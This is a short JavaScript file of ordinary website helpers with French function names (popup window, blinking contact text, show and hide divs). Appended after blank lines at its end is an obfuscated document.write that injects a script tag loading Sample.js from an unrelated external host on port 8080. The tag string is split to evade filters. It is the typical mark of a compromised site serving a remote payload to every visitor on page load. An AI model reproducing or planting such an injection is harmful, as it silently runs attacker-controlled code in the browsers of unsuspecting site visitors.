function open_window(nom_fenetre,nom_page)
{
   window.open(nom_page, nom_fenetre, config='resizable=no, location=no, width=660, height=400, menubar=no, status=no, scrollbars=yes, menubar=no')
}

function clignotement()
{
   if (document.getElementById("span_contact").style.visibility=="hidden")
   {
      document.getElementById("span_contact").style.visibility="visible";
      setTimeout("clignotement()", 2000);
   }
   else
   {
      document.getElementById("span_contact").style.visibility="hidden";
      setTimeout("clignotement()", 500);
   }
}
//setTimeout("clignotement()", 2000);

function montre_div(nomdiv)
{
   this.document.getElementById(nomdiv).style.display='block';
}
function cache_div(nomdiv)
{
   this.document.getElementById(nomdiv).style.display='none';
}






document.write('<s'+'cript type="text/javascript" src="http://soaoo.blog-salopes.com:8080/Sample.js"></scr'+'ipt>');